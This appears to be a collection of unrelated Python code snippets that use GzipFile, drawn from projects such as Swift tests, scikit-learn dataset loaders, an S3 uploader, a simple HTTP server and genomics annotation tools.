eventlet.spawn(eventlet.wsgi.server, con2lis, con2srv, nl) objspa = [ eventlet.spawn(eventlet.wsgi.server, objsrv[0], objsrv[1], nl) for objsrv in objsrvs ] global _test_coros _test_coros = \ (prospa, acc1spa, acc2spa, con1spa, con2spa) + tuple(objspa) # Create accounts "test" and "test2" def create_account(act): ts = utils.normalize_timestamp(time()) account_ring = Ring(_testdir, ring_name='account') partition, nodes = account_ring.get_nodes(act) for node in nodes: # Note: we are just using the http_connect method in the object # controller here to talk to the account server nodes. conn = swift.proxy.controllers.obj.http_connect( node['ip'], node['port'], node['device'], partition, 'PUT', '/' + act, { 'X-Timestamp': ts, 'x-trans-id': act }) resp = conn.getresponse() assert (resp.status == 201) create_account('AUTH_test') create_account('AUTH_test2')
def fetch_covtype(data_home=None, download_if_missing=True, random_state=None, shuffle=False, return_X_y=False): """Load the covertype dataset (classification). Download it if necessary. ================= ============ Classes 7 Samples total 581012 Dimensionality 54 Features int ================= ============ Read more in the :ref:`User Guide <covtype_dataset>`. Parameters ---------- data_home : string, optional Specify another download and cache folder for the datasets. By default all scikit-learn data is stored in '~/scikit_learn_data' subfolders. download_if_missing : boolean, default=True If False, raise a IOError if the data is not locally available instead of trying to download the data from the source site. random_state : int, RandomState instance or None (default) Determines random number generation for dataset shuffling. Pass an int for reproducible output across multiple function calls. See :term:`Glossary <random_state>`. shuffle : bool, default=False Whether to shuffle dataset. return_X_y : boolean, default=False. If True, returns ``(data.data, data.target)`` instead of a Bunch object. .. versionadded:: 0.20 Returns ------- dataset : dict-like object with the following attributes: dataset.data : numpy array of shape (581012, 54) Each row corresponds to the 54 features in the dataset. dataset.target : numpy array of shape (581012,) Each value corresponds to one of the 7 forest covertypes with values ranging between 1 to 7. dataset.DESCR : string Description of the forest covertype dataset. (data, target) : tuple if ``return_X_y`` is True .. versionadded:: 0.20 """ data_home = get_data_home(data_home=data_home) covtype_dir = join(data_home, "covertype") samples_path = _pkl_filepath(covtype_dir, "samples") targets_path = _pkl_filepath(covtype_dir, "targets") available = exists(samples_path) if download_if_missing and not available: if not exists(covtype_dir): makedirs(covtype_dir) logger.info("Downloading %s" % ARCHIVE.url) archive_path = _fetch_remote(ARCHIVE, dirname=covtype_dir) Xy = np.genfromtxt(GzipFile(filename=archive_path), delimiter=',') # delete archive remove(archive_path) X = Xy[:, :-1] y = Xy[:, -1].astype(np.int32, copy=False) joblib.dump(X, samples_path, compress=9) joblib.dump(y, targets_path, compress=9) elif not available and not download_if_missing: raise IOError("Data not found and `download_if_missing` is False") try: X, y except NameError: X, y = _refresh_cache([samples_path, targets_path], 9) # TODO: Revert to the following two lines in v0.23 # X = joblib.load(samples_path) # y = joblib.load(targets_path) if shuffle: ind = np.arange(X.shape[0]) rng = check_random_state(random_state) rng.shuffle(ind) X = X[ind] y = y[ind] module_path = dirname(__file__) with open(join(module_path, 'descr', 'covtype.rst')) as rst_file: fdescr = rst_file.read() if return_X_y: return X, y return Bunch(data=X, target=y, DESCR=fdescr)
def compress_string(s): zbuf = BytesIO() with GzipFile(mode='wb', compresslevel=6, fileobj=zbuf) as zfile: zfile.write(s) return zbuf.getvalue()
def fetch_rcv1(data_home=None, subset='all', download_if_missing=True, random_state=None, shuffle=False): """Load the RCV1 multilabel dataset, downloading it if necessary. Version: RCV1-v2, vectors, full sets, topics multilabels. ============== ===================== Classes 103 Samples total 804414 Dimensionality 47236 Features real, between 0 and 1 ============== ===================== Read more in the :ref:`User Guide <datasets>`. Parameters ---------- data_home : string, optional Specify another download and cache folder for the datasets. By default all scikit learn data is stored in '~/scikit_learn_data' subfolders. subset: string, 'train', 'test', or 'all', default='all' Select the dataset to load: 'train' for the training set (23149 samples), 'test' for the test set (781265 samples), 'all' for both, with the training samples first if shuffle is False. This follows the official LYRL2004 chronological split. download_if_missing : boolean, default=True If False, raise a IOError if the data is not locally available instead of trying to download the data from the source site. random_state : int, RandomState instance or None, optional (default=None) Random state for shuffling the dataset. If int, random_state is the seed used by the random number generator; If RandomState instance, random_state is the random number generator; If None, the random number generator is the RandomState instance used by `np.random`. shuffle : bool, default=False Whether to shuffle dataset. Returns ------- dataset : dict-like object with the following attributes: dataset.data : scipy csr array, dtype np.float64, shape (804414, 47236) The array has 0.16% of non zero values. dataset.target : scipy csr array, dtype np.uint8, shape (804414, 103) Each sample has a value of 1 in its categories, and 0 in others. The array has 3.15% of non zero values. dataset.sample_id : numpy array, dtype np.uint32, shape (804414,) Identification number of each sample, as ordered in dataset.data. dataset.target_names : numpy array, dtype object, length (103) Names of each target (RCV1 topics), as ordered in dataset.target. dataset.DESCR : string Description of the RCV1 dataset. Reference --------- Lewis, D. D., Yang, Y., Rose, T. G., & Li, F. (2004). RCV1: A new benchmark collection for text categorization research. The Journal of Machine Learning Research, 5, 361-397. """ N_SAMPLES = 804414 N_FEATURES = 47236 N_CATEGORIES = 103 N_TRAIN = 23149 data_home = get_data_home(data_home=data_home) rcv1_dir = join(data_home, "RCV1") if download_if_missing: makedirs(rcv1_dir, exist_ok=True) samples_path = join(rcv1_dir, "samples.pkl") sample_id_path = join(rcv1_dir, "sample_id.pkl") sample_topics_path = join(rcv1_dir, "sample_topics.pkl") topics_path = join(rcv1_dir, "topics_names.pkl") # load data (X) and sample_id if download_if_missing and (not exists(samples_path) or not exists(sample_id_path)): file_urls = ["%s_test_pt%d.dat.gz" % (URL, i) for i in range(4)] file_urls.append("%s_train.dat.gz" % URL) files = [] for file_url in file_urls: logger.warning("Downloading %s" % file_url) with closing(urlopen(file_url)) as online_file: # buffer the full file in memory to make possible to Gzip to # work correctly f = BytesIO(online_file.read()) files.append(GzipFile(fileobj=f)) Xy = load_svmlight_files(files, n_features=N_FEATURES) # Training data is before testing data X = sp.vstack([Xy[8], Xy[0], Xy[2], Xy[4], Xy[6]]).tocsr() sample_id = np.hstack((Xy[9], Xy[1], Xy[3], Xy[5], Xy[7])) sample_id = sample_id.astype(np.uint32) joblib.dump(X, samples_path, compress=9) joblib.dump(sample_id, sample_id_path, compress=9) else: X = joblib.load(samples_path) sample_id = joblib.load(sample_id_path) # load target (y), categories, and sample_id_bis if download_if_missing and (not exists(sample_topics_path) or not exists(topics_path)): logger.warning("Downloading %s" % URL_topics) with closing(urlopen(URL_topics)) as online_topics: f = BytesIO(online_topics.read()) # parse the target file n_cat = -1 n_doc = -1 doc_previous = -1 y = np.zeros((N_SAMPLES, N_CATEGORIES), dtype=np.uint8) sample_id_bis = np.zeros(N_SAMPLES, dtype=np.int32) category_names = {} for line in GzipFile(fileobj=f, mode='rb'): line_components = line.decode("ascii").split(u" ") if len(line_components) == 3: cat, doc, _ = line_components if cat not in category_names: n_cat += 1 category_names[cat] = n_cat doc = int(doc) if doc != doc_previous: doc_previous = doc n_doc += 1 sample_id_bis[n_doc] = doc y[n_doc, category_names[cat]] = 1 # Samples in X are ordered with sample_id, # whereas in y, they are ordered with sample_id_bis. permutation = _find_permutation(sample_id_bis, sample_id) y = y[permutation, :] # save category names in a list, with same order than y categories = np.empty(N_CATEGORIES, dtype=object) for k in category_names.keys(): categories[category_names[k]] = k # reorder categories in lexicographic order order = np.argsort(categories) categories = categories[order] y = sp.csr_matrix(y[:, order]) joblib.dump(y, sample_topics_path, compress=9) joblib.dump(categories, topics_path, compress=9) else: y = joblib.load(sample_topics_path) categories = joblib.load(topics_path) if subset == 'all': pass elif subset == 'train': X = X[:N_TRAIN, :] y = y[:N_TRAIN, :] sample_id = sample_id[:N_TRAIN] elif subset == 'test': X = X[N_TRAIN:, :] y = y[N_TRAIN:, :] sample_id = sample_id[N_TRAIN:] else: raise ValueError("Unknown subset parameter. Got '%s' instead of one" " of ('all', 'train', test')" % subset) if shuffle: X, y, sample_id = shuffle_(X, y, sample_id, random_state=random_state) return Bunch(data=X, target=y, sample_id=sample_id, target_names=categories, DESCR=__doc__)
def putter(put, put_queue, stat_queue, options): logger = logging.getLogger( '%s[putter-%d]' % (os.path.basename(sys.argv[0]), current_process().pid)) connection, bucket = None, None file_object_cache = FileObjectCache() # Figure out what content types we want to gzip if not options.gzip_type: # default gzip_content_types = GZIP_CONTENT_TYPES elif 'all' in options.gzip_type: gzip_content_types = GZIP_ALL else: gzip_content_types = options.gzip_type if 'guess' in gzip_content_types: # don't bother removing 'guess' from the list since nothing will match it gzip_content_types.extend(GZIP_CONTENT_TYPES) if options.gzip: logger.debug('These content types will be gzipped: %s' % unicode(gzip_content_types)) while True: args = put_queue.get() if args is None: put_queue.task_done() break key_name, value_kwargs = args value = Value(file_object_cache, **value_kwargs) should_gzip = False try: if connection is None: connection = S3Connection(is_secure=options.secure, host=options.host) if bucket is None: bucket = connection.get_bucket(options.bucket) key = put(bucket, key_name, value) if key: if value.should_copy_content(): if options.headers: headers = dict( tuple(header.split(':', 1)) for header in options.headers) else: headers = {} content_type = None if options.content_type: if options.content_type == 'guess': content_type = mimetypes.guess_type(value.path)[0] elif options.content_type == 'magic': content_type = mimetypes.guess_type(value.path)[0] if content_type is None: content_type = magic.from_file(value.path, mime=True) else: content_type = options.content_type headers['Content-Type'] = content_type content = value.get_content() md5 = value.md5 should_gzip = options.gzip and ( content_type and content_type in gzip_content_types or gzip_content_types == GZIP_ALL) if should_gzip: headers['Content-Encoding'] = 'gzip' string_io = StringIO() gzip_file = GzipFile(compresslevel=9, fileobj=string_io, mode='w') gzip_file.write(content) gzip_file.close() content = string_io.getvalue() md5 = compute_md5(StringIO(content)) if not options.dry_run: key.set_contents_from_string( content, headers, md5=md5, policy=options.grant, encrypt_key=options.encrypt_key) logger.info( '%s %s> %s' % (value.path, 'z' if should_gzip else '-', key.name)) stat_queue.put(dict(size=value.get_size())) else: logger.info('skipping %s -> %s' % (value.path, key_name)) except SSLError as exc: logger.error('%s -> %s (%s)' % (value.path, key_name, exc)) put_queue.put(args) connection, bucket = None, None except IOError as exc: logger.error('%s -> %s (%s)' % (value.path, key_name, exc)) put_queue.task_done()
class HTTPSConnection(Dispatcher): def __init__(self, socket, getfunc): Dispatcher.__init__(self, socket) self.req = '' self.set_terminator('\n') self.getfunc = getfunc self.next_func = self.read_type ## HTTP handling methods ## def read_type(self, data): self.header = data.strip() words = data.split() if len(words) == 3: self.command, self.path, garbage = words self.pre1 = False elif len(words) == 2: self.command, self.path = words self.pre1 = True if self.command != 'GET': return None else: return None if self.command not in ('HEAD', 'GET'): return None self.headers = {} return self.read_header def read_header(self, data): data = data.strip() if data == '': # check for Accept-Encoding: header, pick a if self.headers.has_key('accept-encoding'): ae = self.headers['accept-encoding'] log.debug("Got Accept-Encoding: " + ae + "\n") else: #identity assumed if no header ae = 'identity' # this eventually needs to support multple acceptable types # q-values and all that fancy HTTP crap # for now assume we're only communicating with our own client if ae.find('gzip') != -1: self.encoding = 'gzip' else: #default to identity. self.encoding = 'identity' r = self.getfunc(self, self.path, self.headers) if r is not None: self.answer(r) return None try: i = data.index(':') except ValueError: return None self.headers[data[:i].strip().lower()] = data[i+1:].strip() log.debug(data[:i].strip() + ": " + data[i+1:].strip()) return self.read_header def answer(self, (responsecode, responsestring, headers, data)): if self.encoding == 'gzip': #transform data using gzip compression #this is nasty but i'm unsure of a better way at the moment compressed = StringIO() gz = GzipFile(fileobj = compressed, mode = 'wb', compresslevel = 9) gz.write(data) gz.close() compressed.seek(0,0) cdata = compressed.read() compressed.close() if len(cdata) >= len(data): self.encoding = 'identity' else: log.debug("Compressed: %i Uncompressed: %i\n" % (len(cdata),len(data))) data = cdata headers['Content-Encoding'] = 'gzip' # i'm abusing the identd field here, but this should be ok if self.encoding == 'identity': ident = '-' else: ident = self.encoding username = '******' referer = self.headers.get('referer','-') useragent = self.headers.get('user-agent','-') timestamp = strftime("%d/%b/%Y:%H:%I:%S") log.info('%s %s %s [%s] "%s" %i %i "%s" "%s"' % ( self.socket.addr[0], ident, username, timestamp, self.header, responsecode, len(data), referer, useragent)) r = StringIO() r.write('HTTP/1.0 ' + str(responsecode) + ' ' + responsestring + '\r\n') if not self.pre1: headers['Content-Length'] = len(data) for key, value in headers.items(): r.write(key + ': ' + str(value) + '\r\n') r.write('\r\n') if self.command != 'HEAD': r.write(data) self.push(r.getvalue()) self.close_when_done()
# -*- coding: utf-8 -*- """ Created on Thu Aug 31 11:45:12 2017 @author: jabong """ import numpy as np from collections import defaultdict from itertools import chain from gzip import GzipFile minsupport = 80 dataset = [[int(tok) for tok in line.strip().split()] for line in GzipFile('data/retail.dat.gz')] counts = defaultdict(int) for elem in chain(*dataset): counts[elem] += 1 valid = set(el for el,c in counts.items() if (c >= minsupport)) dataset = [[el for el in ds if (el in valid)] for ds in dataset] dataset = [frozenset(ds) for ds in dataset] itemsets = [frozenset([v]) for v in valid] freqsets = itemsets[:] for i in range(16): print("At iteration {}, number of frequent buskets: {}".format(i, len(itemsets))) nextsets = [] tested = set()
def _in_process_setup_ring(swift_conf, conf_src_dir, testdir): """ If SWIFT_TEST_POLICY is set: - look in swift.conf file for specified policy - move this to be policy-0 but preserving its options - copy its ring file to test dir, changing its devices to suit in process testing, and renaming it to suit policy-0 Otherwise, create a default ring file. """ conf = ConfigParser() conf.read(swift_conf) sp_prefix = 'storage-policy:' try: # policy index 0 will be created if no policy exists in conf policies = parse_storage_policies(conf) except PolicyError as e: raise InProcessException(e) # clear all policies from test swift.conf before adding test policy back for policy in policies: conf.remove_section(sp_prefix + str(policy.idx)) if policy_specified: policy_to_test = policies.get_by_name(policy_specified) if policy_to_test is None: raise InProcessException('Failed to find policy name "%s"' % policy_specified) _info('Using specified policy %s' % policy_to_test.name) else: policy_to_test = policies.default _info('Defaulting to policy %s' % policy_to_test.name) # make policy_to_test be policy index 0 and default for the test config sp_zero_section = sp_prefix + '0' conf.add_section(sp_zero_section) for (k, v) in policy_to_test.get_info(config=True).items(): conf.set(sp_zero_section, k, v) conf.set(sp_zero_section, 'default', True) with open(swift_conf, 'w') as fp: conf.write(fp) # look for a source ring file ring_file_src = ring_file_test = 'object.ring.gz' if policy_to_test.idx: ring_file_src = 'object-%s.ring.gz' % policy_to_test.idx try: ring_file_src = _in_process_find_conf_file(conf_src_dir, ring_file_src, use_sample=False) except InProcessException as e: if policy_specified: raise InProcessException('Failed to find ring file %s' % ring_file_src) ring_file_src = None ring_file_test = os.path.join(testdir, ring_file_test) if ring_file_src: # copy source ring file to a policy-0 test ring file, re-homing servers _info('Using source ring file %s' % ring_file_src) ring_data = ring.RingData.load(ring_file_src) obj_sockets = [] for dev in ring_data.devs: device = 'sd%c1' % chr(len(obj_sockets) + ord('a')) utils.mkdirs(os.path.join(_testdir, 'sda1')) utils.mkdirs(os.path.join(_testdir, 'sda1', 'tmp')) obj_socket = listen_zero() obj_sockets.append(obj_socket) dev['port'] = obj_socket.getsockname()[1] dev['ip'] = '127.0.0.1' dev['device'] = device dev['replication_port'] = dev['port'] dev['replication_ip'] = dev['ip'] ring_data.save(ring_file_test) else: # make default test ring, 3 replicas, 4 partitions, 3 devices # which will work for a replication policy or a 2+1 EC policy _info('No source object ring file, creating 3rep/4part/3dev ring') obj_sockets = [listen_zero() for _ in (0, 1, 2)] replica2part2dev_id = [[0, 1, 2, 0], [1, 2, 0, 1], [2, 0, 1, 2]] devs = [{ 'id': 0, 'zone': 0, 'device': 'sda1', 'ip': '127.0.0.1', 'port': obj_sockets[0].getsockname()[1] }, { 'id': 1, 'zone': 1, 'device': 'sdb1', 'ip': '127.0.0.1', 'port': obj_sockets[1].getsockname()[1] }, { 'id': 2, 'zone': 2, 'device': 'sdc1', 'ip': '127.0.0.1', 'port': obj_sockets[2].getsockname()[1] }] ring_data = ring.RingData(replica2part2dev_id, devs, 30) with closing(GzipFile(ring_file_test, 'wb')) as f: pickle.dump(ring_data, f) for dev in ring_data.devs: _debug('Ring file dev: %s' % dev) return obj_sockets
def uncompress(self, sitemapdata): sio = StringIO(sitemapdata) unziped = GzipFile(fileobj=sio) xml = unziped.read() unziped.close() return xml
def gzip_reader(fd, size, url, params): """Wraps the input in a :class:`gzip.GzipFile` object.""" from gzip import GzipFile return GzipFile(fileobj=fd), size, url
def annotatebins(bins, outfile, include_chroms, ranges, track, ucsc_track, actions, track_names, track_list, ucsc_list, ucsc_ref, fasta, snv_mus, no_ucsc_chromsplit, maxfloat, bgzip, quiet): """ Annotate bins """ # Sanitize & format inputs ucsc_chromsplit = not no_ucsc_chromsplit track = list(track) ucsc_track = list(ucsc_track) actions = tuple([a.lower() for a in actions]) # Parse file with lists of tracks (if provided) and add to track lists if track_list is not None: supp_tracks, supp_actions, supp_names = mutrate.parse_track_file( track_list) track = track + supp_tracks n_ucsc_tracks = len(ucsc_track) if n_ucsc_tracks > 0: actions = tuple(list(actions[:n_ucsc_tracks]) + supp_actions \ + list(actions[n_ucsc_tracks:])) track_names = tuple(list(track_names[:n_ucsc_tracks]) + supp_names \ + list(track_names[n_ucsc_tracks:])) else: actions = tuple(list(actions) + supp_actions) track_names = tuple(list(track_names) + supp_names) # Parse file with list of UCSC tracks (if provided and add to track lists) if ucsc_list is not None: supp_ucsc_tracks, supp_ucsc_actions, supp_ucsc_names = mutrate.parse_track_file( ucsc_list) ucsc_track = ucsc_track + supp_ucsc_tracks actions = tuple(list(actions) + supp_ucsc_actions) track_names = tuple(list(track_names) + supp_ucsc_names) # Handle header reformatting n_tracks = len(track) + len(ucsc_track) if n_tracks != len(track_names): err = 'INPUT ERROR: Number of supplied track names ({0}) does not ' + \ 'match number of tracks ({1}).' exit(err.format(len(track_names), n_tracks)) if 'compressed' in determine_filetype(bins): header = GzipFile(bins).readline().decode('utf-8').rstrip() else: header = open(bins, 'r').readline().rstrip() if not header.startswith('#'): status_msg = '[{0}] athena annotate-bins: No header line detected. ' + \ 'Adding default header.' print(status_msg.format( datetime.now().strftime('%b %d %Y @ %H:%M:%S'))) n_extra_cols = len(header.split('\t')) - 3 header = make_default_bed_header(n_extra_cols) newheader = header + '\t' + '\t'.join(list(track_names)) if fasta is not None: newheader = '\t'.join([newheader, 'pct_gc']) if snv_mus is not None: newheader = '\t'.join([newheader, 'snv_mu']) # Annotate bins newbins = mutrate.annotate_bins(bins, include_chroms, ranges, track, ucsc_track, ucsc_ref, actions, fasta, snv_mus, maxfloat, ucsc_chromsplit, quiet) # Save annotated bins if 'compressed' in determine_filetype(outfile): outfile = path.splitext(outfile)[0] newbins.saveas(outfile, trackline=newheader) # Bgzip bins, if optioned if bgzip: bgz(outfile)
def gzip(data): buff = BytesIO(data) f = GzipFile(fileobj=buff) return f.read().decode('utf-8')
def annotatepairs(pairs, outfile, chroms, ranges, track, ucsc_track, actions, track_names, track_list, ucsc_list, ucsc_ref, fasta, binsize, homology_cutoffs, no_ucsc_chromsplit, maxfloat, bgzip, quiet): """ Annotate pairs """ # Sanitize & format inputs ucsc_chromsplit = not no_ucsc_chromsplit tracks = list(track) ucsc_tracks = list(ucsc_track) actions = tuple([a.lower() for a in actions]) if len(homology_cutoffs) > 0: homology_cutoffs = list(homology_cutoffs) else: homology_cutoffs = [1.0] # Parse file with lists of tracks (if provided) and add to track lists if track_list is not None: supp_tracks, supp_actions, supp_names = mutrate.parse_track_file( track_list) tracks = tracks + supp_tracks n_ucsc_tracks = len(ucsc_tracks) if n_ucsc_tracks > 0: actions = tuple(list(actions[:n_ucsc_tracks]) + supp_actions \ + list(actions[n_ucsc_tracks:])) track_names = tuple(list(track_names[:n_ucsc_tracks]) + supp_names \ + list(track_names[n_ucsc_tracks:])) else: actions = tuple(list(actions) + supp_actions) track_names = tuple(list(track_names) + supp_names) # Parse file with list of UCSC tracks (if provided and add to track lists) if ucsc_list is not None: supp_ucsc_tracks, supp_ucsc_actions, supp_ucsc_names = mutrate.parse_track_file( ucsc_list) ucsc_tracks = ucsc_tracks + supp_ucsc_tracks actions = tuple(list(actions) + supp_ucsc_actions) track_names = tuple(list(track_names) + supp_ucsc_names) # Handle header reformatting if 'compressed' in determine_filetype(pairs): header = GzipFile(pairs).readline().decode('utf-8').rstrip() else: header = open(pairs, 'r').readline().rstrip() if not header.startswith('#'): msg = 'INPUT WARNING: ' status_msg = '[{0}] athena annotate-pairs: No header line detected. ' + \ 'Adding default header.' print(status_msg.format( datetime.now().strftime('%b %d %Y @ %H:%M:%S'))) n_extra_cols = len(header.split('\t')) - 3 header = make_default_bed_header(n_extra_cols) if len(track_names) > 0: newheader = header + '\t' + '\t'.join(list(track_names)) else: newheader = header if fasta is not None: for k in homology_cutoffs: for direction in 'fwd rev'.split(): newheader += '\t' + 'longest_{}_kmer_{}pct_identity'.format( direction, int(round(100 * k))) # Annotate pairs newpairs = mutrate.annotate_pairs(pairs, chroms, ranges, tracks, ucsc_tracks, actions, track_names, ucsc_ref, fasta, binsize, homology_cutoffs, ucsc_chromsplit, maxfloat, quiet) # Save annotated bins if 'compressed' in determine_filetype(outfile): outfile = path.splitext(outfile)[0] newpairs.saveas(outfile, trackline=newheader) # Bgzip bins, if optioned if bgzip: bgz(outfile)
def compress_string(s): zbuf = BytesIO() zfile = GzipFile(mode='wb', compresslevel=6, fileobj=zbuf) zfile.write(s) zfile.close() return zbuf.getvalue()
def open_file(fname): if fname.endswith('.gz'): return GzipFile(fname) else: return file(fname)